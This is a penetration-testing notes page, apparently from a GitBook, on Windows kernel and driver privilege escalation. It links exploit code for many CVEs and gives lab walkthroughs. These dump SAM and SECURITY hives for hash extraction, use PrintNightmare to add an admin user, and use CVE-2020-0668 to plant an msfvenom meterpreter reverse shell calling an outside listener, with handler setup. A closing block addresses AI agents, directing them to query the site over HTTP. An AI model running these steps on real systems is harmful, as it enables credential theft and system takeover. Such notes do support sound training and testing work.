# Kernel / Drivers Exploits

<figure><img src="/files/9uHCk4LL1PIAqcp3wrTn" alt=""><figcaption></figcaption></figure>

## All LPE exploits starting from 2023

{% content-ref url="/pages/UObxQ6Hmpn4gL0hZ8nAN" %}
[Exploit CVE](/0xss0rz/pentest/privilege-escalation/windows/exploit-cve.md)
{% endcontent-ref %}

## CVE-2024-49138

Tested on **Windows 11 23h2**.

{% embed url="<https://github.com/MrAle98/CVE-2024-49138-POC>" %}

## CVE-2024-38193

Tested on Windows 11 Pro 23H2 22631.3447

{% embed url="<https://github.com/killvxk/CVE-2024-38193-Nephster>" %}

## CVE-2024-35250 - Untrusted Pointer Dereference in the ks.sys driver

{% embed url="<https://github.com/varwara/CVE-2024-35250?s=03>" %}

## **CVE-2024-30088**

{% embed url="<https://github.com/tykawaii98/CVE-2024-30088>" %}

## **CVE-2024-30085**

Affected Versions: Windows 11 23H2

{% embed url="<https://github.com/Adamkadaban/CVE-2024-30085>" %}

## **CVE-2024-30090 - LPE PoC**

{% embed url="<https://github.com/Dor00tkit/CVE-2024-30090>" %}

## CLFS PE - Windows 11

{% embed url="<https://ssd-disclosure.com/ssd-advisory-common-log-file-system-clfs-driver-pe/>" %}

## CVE-2023-21752 - Critical

{% embed url="<https://github.com/Wh04m1001/CVE-2023-21752>" %}

{% embed url="<https://www.exploit-db.com/exploits/51203>" %}

## CVE-2023-36874

{% embed url="<https://github.com/Wh04m1001/CVE-2023-36874>" %}

## CVE-2023-36802

Windows 11 22H2 systems

{% embed url="<https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802>" %}

## CVE-2023-29360

Exploit targeting MSKSSRV.SYS driver

{% embed url="<https://github.com/Nero22k/cve-2023-29360>" %}

## CVE-2023-28252

Works on Windows 11 21H2 `clfs.sys` version 10.0.22000.1574 - also works on Windows 10 21H2, Windows 10 22H2, Windows 11 22H2 and Windows server 2022

{% embed url="<https://github.com/duck-sec/CVE-2023-28252-Compiled-exe>" %}

{% embed url="<https://github.com/fortra/CVE-2023-28252>" %}

## CVE-2023-21768

{% embed url="<https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768>" %}

## CVE-2022-21882

Tested on windows 20h2 19042.1415

{% embed url="<https://github.com/KaLendsi/CVE-2022-21882>" %}

{% embed url="<https://github.com/L4ys/CVE-2022-21882>" %}

## Notable Vulnerabilities

### MS08-067

Windows Server 2000, 2003, and 2008 and Windows XP and Vista and allows an unauthenticated attacker to execute arbitrary code with SYSTEM privileges

{% embed url="<https://0xdf.gitlab.io/2019/02/21/htb-legacy.html>" %}

### MS17-010

SMBv1 protocol mishandles packets specially crafted by an attacker, leading to arbitrary code execution on the target host as the SYSTEM account.

{% embed url="<https://0xdf.gitlab.io/2021/05/11/htb-blue.html>" %}

{% content-ref url="/pages/I4NRzgXjYAqaVdEvyCaO" %}
[Windows Exploit](/0xss0rz/pentest/internal-pentest/windows-exploit.md)
{% endcontent-ref %}

### ALPC Task Scheduler 0-Day

{% embed url="<https://blog.grimm-co.com/2020/05/alpc-task-scheduler-0-day.html>" %}

{% embed url="<https://snowscan.io/htb-writeup-hackback/>" %}

### CVE-2021-36934 HiveNightmare, aka SeriousSam

Windows 10 flaw that results in ANY user having rights to read the Windows registry and access sensitive information regardless of privilege level. Researchers quickly developed a PoC exploit to allow reading of the SAM, SYSTEM, and SECURITY registry hives and create copies of them to process offline later and extract password hashes (including local admin) using a tool such as SecretsDump.py

#### Detection

{% embed url="<https://github.com/GossiTheDog/HiveNightmare/blob/master/Mitigation.ps1>" %}

**Checking Permissions on the SAM File**

```cmd-session
C:\htb> icacls c:\Windows\System32\config\SAM

C:\Windows\System32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
```

SAM file is readable by the `BUILTIN\Users` group

#### Exploit

{% embed url="<https://github.com/GossiTheDog/HiveNightmare>" %}

{% embed url="<https://github.com/GossiTheDog/HiveNightmare/raw/master/Release/HiveNightmare.exe>" %}

```powershell-session
PS C:\Users\htb-student\Desktop> .\HiveNightmare.exe

HiveNightmare v0.6 - dump registry hives as non-admin users

Specify maximum number of shadows to inspect with parameter if wanted, default is 15.

Running...

Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM

Success: SAM hive from 2021-08-07 written out to current working directory as SAM-2021-08-07

Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY

Success: SECURITY hive from 2021-08-07 written out to current working directory as SECURITY-2021-08-07

Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM

Success: SYSTEM hive from 2021-08-07 written out to current working directory as SYSTEM-2021-08-07


Assuming no errors above, you should be able to find hive dump files in current working directory.
```

```shell-session
impacket-secretsdump -sam SAM-2021-08-07 -system SYSTEM-2021-08-07 -security SECURITY-2021-08-07 local
```

{% content-ref url="/pages/2bWJOAKkW5kAgsE6acxh" %}
[SAM & LSA secrets](/0xss0rz/pentest/internal-pentest/sam-and-lsa-secrets.md)
{% endcontent-ref %}

### CVE-2021-1675/CVE-2021-34527 PrintNightmare

{% content-ref url="/pages/I4NRzgXjYAqaVdEvyCaO" %}
[Windows Exploit](/0xss0rz/pentest/internal-pentest/windows-exploit.md)
{% endcontent-ref %}

#### Remotely

{% embed url="<https://github.com/cube0x0/CVE-2021-1675>" %}

#### Powershell

{% embed url="<https://github.com/calebstewart/CVE-2021-1675>" %}

By default, this script adds a new local admin user, but we can also supply a custom DLL to obtain a reverse shell or similar if adding a local admin user is not in scope.

**Checking for Spooler Service**

```powershell-session
PS C:\htb> ls \\localhost\pipe\spoolss


    Directory: \\localhost\pipe


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
                                                  spoolss
```

**Adding Local Admin with PrintNightmare PowerShell PoC**

{% content-ref url="/pages/yrRcYBoyWutmbNvRlNZq" %}
[Bypass Powershell Execution Policy](/0xss0rz/pentest/internal-pentest/bypass-powershell-execution-policy.md)
{% endcontent-ref %}

```powershell-session
PS C:\htb> Set-ExecutionPolicy Bypass -Scope Process

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes  [A] Yes to All  [N] No  [L] No to All  [S] Suspend  [?] Help (default is "N"): A
```

```powershell-session
PS C:\htb> Import-Module .\CVE-2021-1675.ps1
PS C:\htb> Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"

[+] created payload at C:\Users\htb-student\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_am
d64_ce3301b66255a0fb\Amd64\mxdwdrv.dll"
[+] added user hacker as local administrator
[+] deleting payload from C:\Users\htb-student\AppData\Local\Temp\nightmare.dll
```

```powershell-session
PS C:\htb> net user hacker

User name                    hacker
Full Name                    hacker
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            ?8/?9/?2021 12:12:01 PM
Password expires             Never
Password changeable          ?8/?9/?2021 12:12:01 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators       
Global Group memberships     *None                 
The command completed successfully.
```

## Enumerating Missing Patches

```powershell-session
PS C:\htb> systeminfo
PS C:\htb> wmic qfe list brief
PS C:\htb> Get-Hotfix
```

We can search for each KB (Microsoft Knowledge Base ID number) in the [Microsoft Update Catalog](https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000808) to get a better idea of what fixes have been installed and how far behind the system may be on security updates.

{% embed url="<https://github.com/bitsadmin/wesng>" %}

## CVE-2020-0668 Example

{% embed url="<https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/>" %}

```cmd-session
C:\htb> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
```

{% embed url="<https://github.com/RedCursorSecurityConsulting/CVE-2020-0668>" %}

Building the solution should create the following files.

```shell-session
CVE-2020-0668.exe
CVE-2020-0668.exe.config
CVE-2020-0668.pdb
NtApiDotNet.dll
NtApiDotNet.xml
```

Pre-compiled:

{% embed url="<https://github.com/0xSs0rZ/Windows_Exploit>" %}

{% embed url="<https://mega.nz/folder/OU1zSAiT#OzrguEdGb3NOqDrayePTRw>" %}

We can use the exploit to create a file of our choosing in a protected folder such as C:\Windows\System32. We aren't able to overwrite any protected Windows files. This privileged file write needs to be chained with another vulnerability, such as [UsoDllLoader](https://github.com/itm4n/UsoDllLoader) or [DiagHub](https://github.com/xct/diaghub) to load the DLL and escalate our privileges. However, the UsoDllLoader technique may not work if Windows Updates are pending or currently being installed, and the DiagHub service may not be available.

We can also look for any third-party software, which can be leveraged, such as the Mozilla Maintenance Service. This service runs in the context of SYSTEM and is startable by unprivileged users. The (non-system protected) binary for this service is located below.

* `C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe`

```cmd-session
C:\htb> icacls "c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                                          BUILTIN\Administrators:(I)(F)
                                                                          BUILTIN\Users:(I)(RX)
                                                                          APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                                                          APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
 
Successfully processed 1 files; Failed processing 0 files
```

### **Generating Malicious Binary**

```shell-session
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.3 LPORT=8443 -f exe > maintenanceservice.exe
```

### **Running the Exploit**

```cmd-session
C:\htb> C:\Tools\CVE-2020-0668\CVE-2020-0668.exe C:\Users\htb-student\Desktop\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"                                       

[+] Moving C:\Users\htb-student\Desktop\maintenanceservice.exe to C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

[+] Mounting \RPC Control onto C:\Users\htb-student\AppData\Local\Temp\nzrghuxz.leo
[+] Creating symbol links
[+] Updating the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASPLAP configuration.
[+] Sleeping for 5 seconds so the changes take effect
[+] Writing phonebook file to C:\Users\htb-student\AppData\Local\Temp\179739c5-5060-4088-a3e7-57c7e83a0828.pbk
[+] Cleaning up
[+] Done!
```

```cmd-session
C:\htb> icacls 'C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe'

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe NT AUTHORITY\SYSTEM:(F)
                                                                          BUILTIN\Administrators:(F)
                                                                          WINLPE-WS02\htb-student:(F)
```

### **Replacing File with Malicious Binary**

```cmd-session
C:\htb> copy /Y C:\Users\htb-student\Desktop\maintenanceservice2.exe "c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
```

### Exploitation

```shell-session
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST <our_ip>
set LPORT 8443
exploit
```

```shell-session
sudo msfconsole -r handler.rc 
```

```cmd-session
C:\htb> net start MozillaMaintenance 
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/windows/kernel-drivers-exploits.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.